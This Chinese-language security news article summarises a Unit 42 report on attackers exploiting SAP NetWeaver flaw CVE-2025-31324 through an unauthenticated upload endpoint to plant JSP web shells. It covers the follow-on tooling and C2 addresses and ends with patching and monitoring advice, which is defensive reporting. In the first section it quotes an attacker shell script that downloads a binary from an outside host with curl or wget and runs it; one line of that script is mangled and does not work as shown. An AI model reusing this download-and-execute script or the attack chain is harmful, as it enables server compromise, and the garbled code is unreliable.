章
目
录
最近,Unit 42发布的一份研究报告引起了网络安全领域的广泛关注。报告显示,影响SAP NetWeaver Visual Composer Framework(7.50版本)的漏洞CVE-2025-31324正被黑客们疯狂利用。这个漏洞的危险等级极高,CVSS评分达到了满分10.0。一旦被利用,未经认证的攻击者就能在SAP应用服务器上肆意上传并执行任意文件,进而实现远程代码执行(RCE),让整个系统完全陷入黑客的掌控之中。
一、漏洞的根源与利用手段
这个漏洞的根源在于/developmentserver/metadatauploader端点,它居然缺少授权检查。这就好比一个重要场所的大门没有保安看守,任何人都能随意进出。这个不安全的文件上传处理器,使得未认证的用户可以把文件放到服务器上能通过网页访问的目录,比如/irj/servlet_jsp/irj/root/ ,恶意的JSP web shell也能趁机被传上去。
Unit 42解释说:“攻击者把web shell传上去之后,就能通过web浏览器访问它 ,然后以SAP应用服务器进程的权限,在服务器上执行各种操作系统命令。”研究人员发现,攻击者部署了像helper.jsp、cache.jsp和ran.jsp这些web shell,其中ran.jsp特别恶劣,它支持通过cmd参数来执行远程命令。在成功部署web shell后,攻击者还会继续部署其他工具,进一步扩大攻击范围。
就像下面这段config.sh shell脚本,就是攻击者后续用来搞破坏的:
#!/bin/sh
if command -v curl &> /dev/null; then
curl -o config https://ocr-freespace.oss-cn-beijing.aliyuncs.com/2025/config
else
if command -v wget &> /dev/null; then
wget -0 config https://ocr-freespace.oss-cn-beijing.aliyuncs.com/2025/config
else
echo "error"
exit 1
fi
fi
cmod *x cog BUF
./config
这段脚本的作用是,先检查服务器上有没有curl工具,如果有,就用curl从指定网址下载一个名为config的文件;要是没有curl,就检查有没有wget工具,有的话就用wget下载。下载完成后,还会对文件进行一些权限设置并执行它。
二、攻击工具链解析
攻击者成功入侵后,就会利用之前埋下的后门,下载config.sh脚本。这个脚本会启动一个叫GOREVERSE的高级开源远程shell工具,它的功能十分强大:
- 基于SSH的shell管理:可以像在本地操作一样,通过SSH协议来管理服务器的shell,方便攻击者执行各种命令。
- 动态转发(SOCKS、SCP、SFTP):能实现多种数据传输方式的动态转发,让攻击者可以更灵活地在服务器和自己的控制端之间传输数据。
- 多传输层(HTTP、TLS、WebSockets):支持多种传输层协议,增加了攻击的隐蔽性和稳定性。
- 安全通道的双向认证:通过双向认证,进一步保障攻击者与服务器之间通信的安全性。
研究报告还指出:“我们发现的样本是一个64位ELF二进制文件,攻击者为了隐藏它的真实目的,使用了一个叫Garble的开源工具进行混淆,这个文件是从ocr-freespace.oss-cn-beijing.aliyuncs[.]com下载的。”
除此之外,威胁行为者还用上了强大的C2框架SUPERSHELL,并且利用47.97.42[.]177和45.76.93[.]60这些已知的恶意IP地址,来持续保持对目标系统的访问权限,就像在目标系统里安了个“钉子”,随时可以进行后续攻击。
三、攻击基础设施与时间线
攻击者很狡猾,他们利用Cloudflare Pages等合法的云服务来托管攻击载荷。比如,在d-69b.pages[.]dev这个网址上,就托管了经过Base64编码的PowerShell脚本。这个脚本一旦执行,就会干这些坏事:
- 生成SSH密钥:为后续更深入的攻击做准备,方便攻击者通过SSH协议访问服务器。
- 终止活动的ssh.exe和sshd.exe进程:破坏服务器原有的SSH服务进程,让服务器的安全防护出现漏洞。
- 下载OpenSSH二进制文件:下载自己准备的OpenSSH二进制文件,可能是经过篡改的,用来实现对服务器的进一步控制。
- 建立回连攻击者控制基础设施的隧道:就像给服务器和攻击者之间搭了一条秘密通道,攻击者可以随时通过这条通道对服务器进行操控。
值得一提的是,Unit 42通过监测数据发现,早在2025年1月,这个漏洞可能就已经被攻击者探测到了,到2025年3月,他们就开始大规模利用这个漏洞进行攻击,而SAP直到2025年4月24日才公开披露这个漏洞,这中间有很长一段时间,很多用户的系统都处于危险之中。
四、防护建议
这个漏洞利用起来太容易了,而且危害极大,所以使用SAP NetWeaver的用户必须马上采取以下措施:
- 应用补丁:及时打上官方发布的补丁,把漏洞这个“大门”给关上,让攻击者无机可乘。
- 监控异常活动:尤其是要密切关注对/developmentserver/metadatauploader端点的访问情况,如果发现有异常的访问请求,很可能就是攻击者在试探或者已经开始攻击了。
- 检查是否存在已知恶意JSP文件:定期检查服务器上有没有像helper.jsp、cache.jsp和ran.jsp这些已知的恶意JSP文件,如果有,要及时删除并进行安全加固。
网络安全无小事,大家一定要重视起来,及时做好防护措施,避免自己的系统遭受攻击。
